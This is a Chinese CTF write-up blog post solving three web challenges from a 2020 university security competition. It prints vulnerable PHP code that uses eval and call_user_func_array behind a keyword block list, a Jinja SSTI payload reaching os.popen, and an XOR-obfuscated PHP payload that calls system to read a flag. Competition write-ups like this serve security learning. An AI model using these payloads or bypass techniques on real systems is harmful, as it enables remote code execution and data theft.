第十三届全国大学生信息安全竞赛-创新实践能力赛西南赛区选拔赛wp

字数统计: 326字   |   阅读时长: 1分
CTF

一场言难尽比赛,孤军奋战,尽力就好…..

day1

web1

扫一下目录,有个www.rar,解压审计一下代码,找到关键文件key.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
	class XJNU{
		private function flag(){
			echo $flag;
		}
	}


	if(preg_match("/system|exec|eval|shell_exec|passthru|phpinfo/i" , $_GET['f'])){
		die("do not attack me");
	}
	if(preg_match("/system|exec|eval|shell_exec|passthru|phpinfo/i" , $_GET['c'])){
		die("do not attack me");
	}
	if(preg_match("/XJNU|flag/i" , $_GET['f']) || preg_match("/XJNU|flag/i" , $_GET['c'])){
		die("no way!<br>");
	}
	$new = call_user_func_array($_GET['f'],["", $_GET['b']]);
	eval($_GET['c']);
?>

回调函数的rce,不过因为参数c过滤不严格,导致可以通过getheader来rce。

先var_dump(scand(“/“))找到flag文件,再用readfile读就可以了。

Web2

随便输入账户登录进去,fuzz一下,在每日报告的第三个参数存在ssti。过滤了些关键字,用globals来找就行。

payload:

1
status_1=&status_2=&status_3={{url_for.__globals__.os.popen('cat /flag2333_canufindit').read()}}

day2

simplecalculator

一个简单的命令执行,Ban一些符号与字符函数,可以通过重载函数的方法来调用。因此我们利用异或拼出GET然后调用system来rec。

image-20200920162855771

Payload如下:

1
`http://172.1.21.13/flag.php?search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag.txt

`

image-20200920163003542

本文标题:第十三届全国大学生信息安全竞赛-创新实践能力赛西南赛区选拔赛wp

文章作者:lexsd6

发布时间:2020-09-22, 10:24:42

最后更新:2020-10-14, 15:41:00

原始链接:lexsd6.github.io/2020/09/22/%E7%AC%AC%E5%8D%81%E4%B8%89%E5%B1%8A%E5%85%A8%E5%9B%BD%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B-%E5%88%9B%E6%96%B0%E5%AE%9E%E8%B7%B5%E8%83%BD%E5%8A%9B%E8%B5%9B%E8%A5%BF%E5%8D%97%E8%B5%9B%E5%8C%BA%E9%80%89%E6%8B%94%E8%B5%9Bwp/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. day1
    1. web1
    2. Web2
  • day2
    1. simplecalculator
    • |